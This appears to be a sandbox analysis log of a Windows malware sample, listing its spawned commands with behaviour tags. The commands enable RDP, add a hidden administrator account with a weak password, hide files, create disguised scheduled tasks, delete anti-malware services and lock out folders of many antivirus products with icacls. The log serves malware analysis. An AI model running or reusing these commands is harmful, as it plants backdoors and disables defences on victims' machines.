reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
9⤵
PID:4532

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
9⤵
PID:4424

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
9⤵
PID:4748

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
9⤵
PID:4100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
10⤵
PID:4972

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:4916

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
9⤵
PID:4832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
10⤵
PID:1008

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
9⤵
PID:2720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
10⤵
PID:5072

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
9⤵
PID:4820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
10⤵
PID:4396

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
9⤵
PID:4548

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
10⤵
PID:4484

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
9⤵
PID:4624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:4564

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
9⤵
PID:3520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
10⤵
PID:4556

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
9⤵
PID:4952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
10⤵
PID:2368

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
9⤵
PID:3872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:1520

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
9⤵
PID:4172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:4928

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
10⤵
PID:4336

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
9⤵
- Executes dropped EXE
PID:4772

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
9⤵
PID:1528

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
9⤵
PID:4052

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
10⤵
PID:4780

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
9⤵
- Views/modifies file attributes
PID:4140

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
9⤵
- Views/modifies file attributes
PID:4224

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
9⤵
- Views/modifies file attributes
PID:4208

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
4⤵
- Drops file in Drivers directory
PID:1844

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:1524

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4980

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4824

C:\ProgramData\WindowsTask\update.exe
C:\ProgramData\WindowsTask\update.exe
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2224

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:2176

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:3940

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:3160

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:3224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
2⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
3⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
2⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
3⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
2⤵
- Suspicious use of WriteProcessMemory
PID:1188

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
3⤵
PID:2528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
2⤵
PID:3356

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
3⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
2⤵
PID:3916

C:\Windows\SysWOW64\sc.exe
sc delete swprv
3⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
2⤵
PID:3860

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
3⤵
PID:4008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
2⤵
PID:2564

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
3⤵
PID:2956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
2⤵
PID:908

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
3⤵
PID:2148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
2⤵
PID:916

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
3⤵
PID:3812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
2⤵
PID:2132

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
3⤵
PID:3824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
2⤵
PID:1372

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
PID:2196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
2⤵
PID:2236

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
2⤵
PID:2676

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
3⤵
PID:388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
2⤵
PID:1836

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:3084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
2⤵
PID:744

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:4108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
2⤵
PID:4128

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
2⤵
PID:4144

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
2⤵
PID:4260

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
2⤵
PID:4272

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
2⤵
PID:4292

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
2⤵
PID:4428

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
2⤵
PID:4508

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
2⤵
PID:4616

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
2⤵
PID:4752

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4988

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
2⤵
PID:4764

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
2⤵
PID:4784

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
2⤵
PID:4860

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
2⤵
PID:4876

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
3⤵
- Modifies file permissions
PID:5076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
2⤵
PID:5000

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
3⤵
- Modifies file permissions
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
2⤵
PID:5100

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
3⤵
- Modifies file permissions
PID:4156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
2⤵
PID:4256

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
- Modifies file permissions
PID:4384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
2⤵
PID:4288

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
2⤵
PID:4340

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
2⤵
PID:4360

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
2⤵
PID:4584

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
2⤵
PID:4732

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
2⤵
PID:4600

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
2⤵
PID:3844

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
2⤵
PID:2928

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:3124

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
2⤵
PID:1388

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
2⤵
PID:5008

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
2⤵
PID:4888

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:4816

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4964

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4896

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4252

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:4312

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:4452

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
2⤵
PID:4456

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:4592

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4628

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
2⤵
PID:4104

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
2⤵
PID:2220

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:912

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:2844

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:5032

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4836

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
2⤵
PID:4160

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
2⤵
PID:5048

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:5104

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:4464

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:4644

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:4124

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
2⤵
PID:4676

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:2128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
2⤵
PID:588

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:4912

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:2572

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:5096

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:4416

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
2⤵
PID:4460

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4656

C:\Programdata\Install\utorrent.exe
C:\Programdata\Install\utorrent.exe
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
PID:4960

C:\ProgramData\WindowsTask\azur.exe
C:\ProgramData\WindowsTask\azur.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
4⤵
PID:3760

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
5⤵
- Delays execution with timeout.exe
PID:756

